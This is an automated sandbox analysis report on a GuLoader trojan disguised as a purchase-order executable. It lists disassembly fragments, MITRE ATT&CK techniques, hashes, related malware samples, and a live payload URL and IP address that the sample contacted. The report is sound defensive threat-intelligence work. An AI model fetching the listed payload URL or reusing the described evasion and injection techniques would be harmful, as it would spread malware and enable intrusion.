      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348997A9 mov eax, dword ptr fs:[00000030h]5_2_348997A9
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3489F7AF mov eax, dword ptr fs:[00000030h]5_2_3489F7AF
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3489F7AF mov eax, dword ptr fs:[00000030h]5_2_3489F7AF
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3489F7AF mov eax, dword ptr fs:[00000030h]5_2_3489F7AF
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3489F7AF mov eax, dword ptr fs:[00000030h]5_2_3489F7AF
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3489F7AF mov eax, dword ptr fs:[00000030h]5_2_3489F7AF
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348107AF mov eax, dword ptr fs:[00000030h]5_2_348107AF
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3483D7B0 mov eax, dword ptr fs:[00000030h]5_2_3483D7B0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348E37B6 mov eax, dword ptr fs:[00000030h]5_2_348E37B6
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34817152 mov eax, dword ptr fs:[00000030h]5_2_34817152
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34816154 mov eax, dword ptr fs:[00000030h]5_2_34816154
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34816154 mov eax, dword ptr fs:[00000030h]5_2_34816154
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3480C156 mov eax, dword ptr fs:[00000030h]5_2_3480C156
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348E5152 mov eax, dword ptr fs:[00000030h]5_2_348E5152
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3480F172 mov eax, dword ptr fs:[00000030h]5_2_3480F172
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3480F172 mov eax, dword ptr fs:[00000030h]5_2_3480F172
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3480F172 mov eax, dword ptr fs:[00000030h]5_2_3480F172
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3480F172 mov eax, dword ptr fs:[00000030h]5_2_3480F172
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3480F172 mov eax, dword ptr fs:[00000030h]5_2_3480F172
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3480F172 mov eax, dword ptr fs:[00000030h]5_2_3480F172
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3480F172 mov eax, dword ptr fs:[00000030h]5_2_3480F172
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3480F172 mov eax, dword ptr fs:[00000030h]5_2_3480F172
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3480F172 mov eax, dword ptr fs:[00000030h]5_2_3480F172
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3480F172 mov eax, dword ptr fs:[00000030h]5_2_3480F172
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3480F172 mov eax, dword ptr fs:[00000030h]5_2_3480F172
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3480F172 mov eax, dword ptr fs:[00000030h]5_2_3480F172
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3480F172 mov eax, dword ptr fs:[00000030h]5_2_3480F172
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3480F172 mov eax, dword ptr fs:[00000030h]5_2_3480F172
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3480F172 mov eax, dword ptr fs:[00000030h]5_2_3480F172
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3480F172 mov eax, dword ptr fs:[00000030h]5_2_3480F172
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3480F172 mov eax, dword ptr fs:[00000030h]5_2_3480F172
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3480F172 mov eax, dword ptr fs:[00000030h]5_2_3480F172
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3480F172 mov eax, dword ptr fs:[00000030h]5_2_3480F172
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3480F172 mov eax, dword ptr fs:[00000030h]5_2_3480F172
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3480F172 mov eax, dword ptr fs:[00000030h]5_2_3480F172
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348A9179 mov eax, dword ptr fs:[00000030h]5_2_348A9179
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3484E284 mov eax, dword ptr fs:[00000030h]5_2_3484E284
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3484E284 mov eax, dword ptr fs:[00000030h]5_2_3484E284
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34890283 mov eax, dword ptr fs:[00000030h]5_2_34890283
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34890283 mov eax, dword ptr fs:[00000030h]5_2_34890283
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34890283 mov eax, dword ptr fs:[00000030h]5_2_34890283
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348E5283 mov eax, dword ptr fs:[00000030h]5_2_348E5283
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3484329E mov eax, dword ptr fs:[00000030h]5_2_3484329E
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3484329E mov eax, dword ptr fs:[00000030h]5_2_3484329E
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348202A0 mov eax, dword ptr fs:[00000030h]5_2_348202A0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348202A0 mov eax, dword ptr fs:[00000030h]5_2_348202A0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348252A0 mov eax, dword ptr fs:[00000030h]5_2_348252A0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348252A0 mov eax, dword ptr fs:[00000030h]5_2_348252A0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348252A0 mov eax, dword ptr fs:[00000030h]5_2_348252A0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348252A0 mov eax, dword ptr fs:[00000030h]5_2_348252A0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348A62A0 mov eax, dword ptr fs:[00000030h]5_2_348A62A0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348A62A0 mov ecx, dword ptr fs:[00000030h]5_2_348A62A0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348A62A0 mov eax, dword ptr fs:[00000030h]5_2_348A62A0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348A62A0 mov eax, dword ptr fs:[00000030h]5_2_348A62A0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348A62A0 mov eax, dword ptr fs:[00000030h]5_2_348A62A0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348A62A0 mov eax, dword ptr fs:[00000030h]5_2_348A62A0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348A72A0 mov eax, dword ptr fs:[00000030h]5_2_348A72A0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348A72A0 mov eax, dword ptr fs:[00000030h]5_2_348A72A0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348D92A6 mov eax, dword ptr fs:[00000030h]5_2_348D92A6
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348D92A6 mov eax, dword ptr fs:[00000030h]5_2_348D92A6
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348D92A6 mov eax, dword ptr fs:[00000030h]5_2_348D92A6
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348D92A6 mov eax, dword ptr fs:[00000030h]5_2_348D92A6
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348992BC mov eax, dword ptr fs:[00000030h]5_2_348992BC
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348992BC mov eax, dword ptr fs:[00000030h]5_2_348992BC
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348992BC mov ecx, dword ptr fs:[00000030h]5_2_348992BC
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348992BC mov ecx, dword ptr fs:[00000030h]5_2_348992BC
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3481A2C3 mov eax, dword ptr fs:[00000030h]5_2_3481A2C3
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3481A2C3 mov eax, dword ptr fs:[00000030h]5_2_3481A2C3
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3481A2C3 mov eax, dword ptr fs:[00000030h]5_2_3481A2C3
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3481A2C3 mov eax, dword ptr fs:[00000030h]5_2_3481A2C3
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3481A2C3 mov eax, dword ptr fs:[00000030h]5_2_3481A2C3
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348192C5 mov eax, dword ptr fs:[00000030h]5_2_348192C5
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348192C5 mov eax, dword ptr fs:[00000030h]5_2_348192C5
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3480B2D3 mov eax, dword ptr fs:[00000030h]5_2_3480B2D3
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3480B2D3 mov eax, dword ptr fs:[00000030h]5_2_3480B2D3
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3480B2D3 mov eax, dword ptr fs:[00000030h]5_2_3480B2D3
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3483F2D0 mov eax, dword ptr fs:[00000030h]5_2_3483F2D0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3483F2D0 mov eax, dword ptr fs:[00000030h]5_2_3483F2D0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348C12ED mov eax, dword ptr fs:[00000030h]5_2_348C12ED
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348C12ED mov eax, dword ptr fs:[00000030h]5_2_348C12ED
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348C12ED mov eax, dword ptr fs:[00000030h]5_2_348C12ED
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348C12ED mov eax, dword ptr fs:[00000030h]5_2_348C12ED
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348C12ED mov eax, dword ptr fs:[00000030h]5_2_348C12ED
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348C12ED mov eax, dword ptr fs:[00000030h]5_2_348C12ED
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348C12ED mov eax, dword ptr fs:[00000030h]5_2_348C12ED
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348C12ED mov eax, dword ptr fs:[00000030h]5_2_348C12ED
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348C12ED mov eax, dword ptr fs:[00000030h]5_2_348C12ED
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348C12ED mov eax, dword ptr fs:[00000030h]5_2_348C12ED
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348C12ED mov eax, dword ptr fs:[00000030h]5_2_348C12ED
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348C12ED mov eax, dword ptr fs:[00000030h]5_2_348C12ED
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348C12ED mov eax, dword ptr fs:[00000030h]5_2_348C12ED
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348C12ED mov eax, dword ptr fs:[00000030h]5_2_348C12ED
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348202E1 mov eax, dword ptr fs:[00000030h]5_2_348202E1
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe Process created: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe "C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe"
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe Code function: 0_2_0040338F EntryPoint,LdrInitializeThunk,SetErrorMode,GetVersion,lstrlenA,LdrInitializeThunk,#17,OleInitialize,LdrInitializeThunk,SHGetFileInfoW,GetCommandLineW,CharNextW,LdrInitializeThunk,GetTempPathW,LdrInitializeThunk,GetTempPathW,GetWindowsDirectoryW,lstrcatW,LdrInitializeThunk,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,LdrInitializeThunk,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,LdrInitializeThunk,ExitWindowsEx,ExitProcess

      Stealing of Sensitive Information

      Source: Yara match File source: 00000005.00000002.2478615286.0000000034480000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

      Remote Access Functionality

      Source: Yara match File source: 00000005.00000002.2478615286.0000000034480000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      • Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS
      • Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services
      • Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services
      • Execution: 1 Native API; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers
      • Persistence: 1 Registry Run Keys / Startup Folder; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items
      • Privilege Escalation: 1 Access Token Manipulation; 11 Process Injection; 1 Registry Run Keys / Startup Folder; 1 DLL Side-Loading; Network Logon Script; RC Scripts; Startup Items
      • Defense Evasion: 11 Masquerading; 1 Virtualization/Sandbox Evasion; 1 Access Token Manipulation; 11 Process Injection; 1 Deobfuscate/Decode Files or Information; 2 Obfuscated Files or Information; 1 DLL Side-Loading
      • Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync
      • Discovery: 211 Security Software Discovery; 1 Virtualization/Sandbox Evasion; 3 File and Directory Discovery; 23 System Information Discovery; Internet Connection Discovery; Wi-Fi Discovery; Remote System Discovery
      • Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management
      • Collection: 1 Archive Collected Data; 1 Clipboard Data; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture
      • Command and Control: 1 Encrypted Channel; 1 Ingress Tool Transfer; 1 Non-Application Layer Protocol; 11 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port
      • Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel
      • Impact: 1 System Shutdown/Reboot; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery
      Source | Detection | Scanner | Label | Link
      Purchase Order Purchase Order Purchase Order Purchase Order.exe | 27% | ReversingLabs | Win32.Trojan.Guloader |
      Source | Detection | Scanner | Label | Link
      C:\Users\user\AppData\Local\Temp\nsh5948.tmp\System.dll | 3% | ReversingLabs | |
      No Antivirus matches
      No Antivirus matches
      Source | Detection | Scanner | Label | Link
      http://185.222.57.90/zFSrvbrRquo53.bin | 0% | Avira URL Cloud | safe |
      http://185.222.57.90/zFSrvbrRquo53.binlb | 0% | Avira URL Cloud | safe |
      No contacted domains info
      Name | Malicious | Antivirus Detection | Reputation
      http://185.222.57.90/zFSrvbrRquo53.bin | false | Avira URL Cloud: safe | unknown
      Name | Source | Malicious | Antivirus Detection | Reputation
      http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd | Purchase Order Purchase Order Purchase Order Purchase Order.exe, 00000005.00000001.1989166062.00000000005F2000.00000020.00000001.01000000.00000006.sdmp | false | | high
      http://www.ftp.ftp://ftp.gopher. | Purchase Order Purchase Order Purchase Order Purchase Order.exe, 00000005.00000001.1989166062.0000000000649000.00000020.00000001.01000000.00000006.sdmp | false | | high
      http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd | Purchase Order Purchase Order Purchase Order Purchase Order.exe, 00000005.00000001.1989166062.00000000005F2000.00000020.00000001.01000000.00000006.sdmp | false | | high
      http://nsis.sf.net/NSIS_ErrorError | Purchase Order Purchase Order Purchase Order Purchase Order.exe | false | | high
      http://185.222.57.90/zFSrvbrRquo53.binlb | Purchase Order Purchase Order Purchase Order Purchase Order.exe, 00000005.00000002.2450313980.00000000047B8000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
      https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214 | Purchase Order Purchase Order Purchase Order Purchase Order.exe, 00000005.00000001.1989166062.0000000000649000.00000020.00000001.01000000.00000006.sdmp | false | | high
      IP | Domain | Country | Flag | ASN | ASN Name | Malicious
      185.222.57.90 | unknown | Netherlands | | 51447 | ROOTLAYERNETNL | false
      Joe Sandbox version: 41.0.0 Charoite
      Analysis ID: 1557894
      Start date and time: 2024-11-18 18:09:09 +01:00
      Joe Sandbox product: CloudBasic
      Overall analysis duration: 0h 7m 26s
      Hypervisor based Inspection enabled: false
      Report type: full
      Cookbook file name: default.jbs
      Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
      Number of analysed new started processes analysed: 8
      Number of new started drivers analysed: 0
      Number of existing processes analysed: 0
      Number of existing drivers analysed: 0
      Number of injected processes analysed: 0
      Technologies:
      • HCA enabled
      • EGA enabled
      • AMSI enabled
      Analysis Mode: default
      Analysis stop reason: Timeout
      Sample name: Purchase Order Purchase Order Purchase Order Purchase Order.exe
      Detection: MAL
      Classification: mal80.troj.evad.winEXE@3/8@0/1
      EGA Information:
      • Successful, ratio: 100%
      HCA Information:
      • Successful, ratio: 90%
      • Number of executed functions: 47
      • Number of non-executed functions: 298
      Cookbook Comments:
      • Found application associated with file extension: .exe
      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
      • Not all processes were analyzed, report is missing behavior information
      • Report size getting too big, too many NtOpenKeyEx calls found.
      • Report size getting too big, too many NtQueryValueKey calls found.
      • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
      • VT rate limit hit for: Purchase Order Purchase Order Purchase Order Purchase Order.exe
      Time | Type | Description
      12:11:48 | API Interceptor | 3x Sleep call for process: Purchase Order Purchase Order Purchase Order Purchase Order.exe modified
      Match | Associated Sample Name / URL | Detection | Threat Name | Context
      185.222.57.90 | NK098765434567890-87654345678.exe | malicious | Nanocore |
      185.222.57.90 | NAC0098765434567890-09876.exe | malicious | Nanocore |
      185.222.57.90 | RHK098760045678009000.exe | malicious | Nanocore |
      185.222.57.90 | FHKPO098765432345.exe | malicious | Remcos |
      No context
      Match | Associated Sample Name / URL | Detection | Threat Name | Context
      ROOTLAYERNETNL | 9dOKGgFNL2.exe | malicious | RedLine | 45.137.22.126
      ROOTLAYERNETNL | RFQ List and airflight 2024.pif.exe | malicious | PureLog Stealer | 45.137.22.174
      ROOTLAYERNETNL | Calyciform.exe | malicious | GuLoader | 45.137.22.248
      ROOTLAYERNETNL | I5pvP0CU6M.exe | malicious | RedLine | 45.137.22.248
      ROOTLAYERNETNL | gLsenXDHxP.exe | malicious | RedLine | 185.222.58.240
      ROOTLAYERNETNL | DEVIS + FACTURE.exe | malicious | Remcos, GuLoader | 45.137.22.126
      ROOTLAYERNETNL | PZNfhfaj9O.exe | malicious | RedLine | 185.222.58.80
      ROOTLAYERNETNL | ZxS8mP8uE6.exe | malicious | RedLine | 45.137.22.123
      ROOTLAYERNETNL | nu28HwzQwC.exe | malicious | RedLine | 185.222.58.52
      ROOTLAYERNETNL | DKO6uy1Tia.exe | malicious | RedLine | 45.137.22.70
      No context
      Match | Associated Sample Name / URL | Detection | Threat Name | Context
      C:\Users\user\AppData\Local\Temp\nsh5948.tmp\System.dll | MG-Docu6800001.exe | malicious | GuLoader |
      C:\Users\user\AppData\Local\Temp\nsh5948.tmp\System.dll | Fac.exe | malicious | GuLoader, Snake Keylogger |
      C:\Users\user\AppData\Local\Temp\nsh5948.tmp\System.dll | Factura Honorarios 2024-11-17.exe | malicious | GuLoader, Snake Keylogger |
      C:\Users\user\AppData\Local\Temp\nsh5948.tmp\System.dll | JOSHHHHHH.exe | malicious | GuLoader, Snake Keylogger |
      C:\Users\user\AppData\Local\Temp\nsh5948.tmp\System.dll | rCEMG242598.exe | malicious | GuLoader, Snake Keylogger |
      C:\Users\user\AppData\Local\Temp\nsh5948.tmp\System.dll | SBSLMD5qhm.msi | malicious | Metasploit |
      C:\Users\user\AppData\Local\Temp\nsh5948.tmp\System.dll | mU4lYkmS6K.exe | malicious | CobaltStrike |
      C:\Users\user\AppData\Local\Temp\nsh5948.tmp\System.dll | SBSLMD5qhm.msi | malicious | Metasploit |
      C:\Users\user\AppData\Local\Temp\nsh5948.tmp\System.dll | mU4lYkmS6K.exe | malicious | CobaltStrike |
      C:\Users\user\AppData\Local\Temp\nsh5948.tmp\System.dll | TouchEn_nxKey_32bit.exe | malicious | Unknown |
      Process: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe
      File Type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
      Category: dropped
      Size (bytes): 11776
      Entropy (8bit): 5.890541747176257
      Encrypted: false
      SSDEEP: 192:X24sihno0bW+l97H4GB7QDs91kMtwtobTr4u+QHbazMNHT7dmNIEr:m8vJl97JeoxtN/r3z7YV
      MD5: 75ED96254FBF894E42058062B4B4F0D1
      SHA1: 996503F1383B49021EB3427BC28D13B5BBD11977
      SHA-256: A632D74332B3F08F834C732A103DAFEB09A540823A2217CA7F49159755E8F1D7
      SHA-512: 58174896DB81D481947B8745DAFE3A02C150F3938BB4543256E8CCE1145154E016D481DF9FE68DAC6D48407C62CBE20753320EBD5FE5E84806D07CE78E0EB0C4
      Malicious: false
      Antivirus:
      • Antivirus: ReversingLabs, Detection: 3%
      Joe Sandbox View:
      • Filename: MG-Docu6800001.exe, Detection: malicious
      • Filename: Fac.exe, Detection: malicious
      • Filename: Factura Honorarios 2024-11-17.exe, Detection: malicious
      • Filename: JOSHHHHHH.exe, Detection: malicious
      • Filename: rCEMG242598.exe, Detection: malicious
      • Filename: SBSLMD5qhm.msi, Detection: malicious
      • Filename: mU4lYkmS6K.exe, Detection: malicious
      • Filename: SBSLMD5qhm.msi, Detection: malicious
      • Filename: mU4lYkmS6K.exe, Detection: malicious
      • Filename: TouchEn_nxKey_32bit.exe, Detection: malicious
      Reputation: moderate, very likely benign file
                                            Process:C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):249837
                                            Entropy (8bit):1.2410746997695157
                                            Encrypted:false
                                            SSDEEP:768:d6sbjlB29qJBBoYbES9BCDKXC9HOak6p6MDrQsv8Ajldp8tEcf0TeMhz3CqXuwl7:tf1wx3et4e+lL5WwgzfZTc
                                            MD5:F1A91A75CAAA712680DA4475E1CDA954
                                            SHA1:C341696CBB8AF494821F8D16EA5E30B7827F5393
                                            SHA-256:79C33E51A0D2271F4252D793D8B9BCEF9F1F817FF3E61C94ECC59E615EC68DCE
                                            SHA-512:F43E478ADCCAF2CBD9FF9F2A4F920B63F53A82E028CD5ADFB41896EC04EB626FD15E283CB35D8C4D2A95EA8B5A7E59102A8A306C4DF60375C257A04150616906
                                            Malicious:false
                                            Reputation:low
                                            Process:C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe
                                            File Type:TTComp archive data, binary, 4K dictionary
                                            Category:dropped
                                            Size (bytes):40687
                                            Entropy (8bit):4.5997894189869815
                                            Encrypted:false
                                            SSDEEP:384:KydpqkEFLRpyBDIag9EJG15JghsD4q3R3TD/FS0v29Akde6QYqOmN3LIV9re3bef:woFgH1EsM8H/UakYEI7I8LLgk4P
                                            MD5:35D47296CFB14E694BC97D22A92D42A1
                                            SHA1:BD0C529FFF26F900DB7948353F87377A31D0890D
                                            SHA-256:52716A62B0CE128607785167F560D0890D4C79CFEF11E677945720D4B691F858
                                            SHA-512:925F88965A2CF617F060E3A5464B8E601C4C5F963FBD955FE35AD7F72759C72E44742486295F51342DB8633600E5F97FF764E0222DD6B53931F93303F9407BE0
                                            Malicious:false
                                            Reputation:low
                                            Process:C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe
                                            File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 600x600, segment length 16, progressive, precision 8, 337x200, components 1
                                            Category:dropped
                                            Size (bytes):5453
                                            Entropy (8bit):7.8833870423876355
                                            Encrypted:false
